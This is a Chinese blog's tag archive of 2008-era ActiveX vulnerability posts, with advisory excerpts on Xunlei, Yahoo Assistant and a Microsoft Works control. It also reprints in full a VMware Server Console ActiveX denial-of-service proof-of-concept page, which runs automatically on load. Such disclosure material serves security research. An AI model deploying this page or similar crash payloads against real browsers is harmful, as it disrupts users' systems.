标签 ‘Activex’ 下的日志
Microsoft Office Snapshot Viewer ActiveX Exploit
迅雷ActiveX控件远程代码执行漏洞
by cocoruder(frankruer_at_hotmail.com)
http://ruder.cdut.net
Summary:
迅雷是一款在中国非常流行的基于P2SP技术的下载软件。更多详细信息请参考:
在迅雷5的一个ActiveX控件中存在一个远程代码执行漏洞,远程攻击者可利用此漏洞在被攻击者系统上以当前浏览器权限执行任意代码,进而可安装木马以及间谍程序。
Tags: Activex, 迅雷VMware Server Console ActiveX DOS POC
<html>
<title>VMware Server Console ActiveX DOS POC</title>
<!--
Author:Shennan Wang
blog:http://hi.baidu.com/nansec
stuff:http://www.d4rkn3t.cn
thanks:
Robinh00d,ayarei,void
-->
<head>
<script language="JavaScript">
function test() {
var bufA = "2";
var bufB = "0";
var bufC = "0";
var bufD = "8";
for (i = 0; i < 2008; i++) {
bufA += bufA;}
for (i = 0; i < 2008; i++){
bufB += bufB;}
for (i = 0; i < 2008; i++){
bufC += bufC;}
for (i = 0; i < 2008; i++){
bufD += bufD;}
nansec.DoModalDirect(bufA,bufB,bufC,bufD);}
</script>
</head>
<body onload="JavaScript: return test();">
<object classid="clsid:D2C53A29-B43A-4367-B808-52CE785BBF36" id="nansec">
</object>
</body>
</html>
# milw0rm.com [2008-05-28]Yahoo! 助手(3721) ActiveX远程代码执行漏洞
来源:
发现者: Sowhat of Nevis Labs
日期: 2008.05.06
http://hi.baidu.com/secway/blog/item/d9b45dddf0603bdc8d1029a9.html
http://secway.org/advisory/AD20080506EN.txt
http://secway.org/advisory/AD20080506CN.txt
CVE: N/A
厂商
Yahoo! CN
受影响版本:
Yahoo! Assistant<=3.6 (04/23/2008之前版本)
阅读全文 »
Microsoft Works 7 WkImgSrv.dll ActiveX Remote BOF Exploit
<!--
The problem is in wkimgsrv.dll module shipped with many MS Offiice
Suite (tested on MS OF 2003,MS OF 2007)
Actually,this is not the case of buffer overflow attack,just a exploit
of insecure method WKsPictureInterface.
Setting this point to any where in memory and IE will crash when
wkiimgsrv's trying to access an invalid memory location.
阅读全文 »
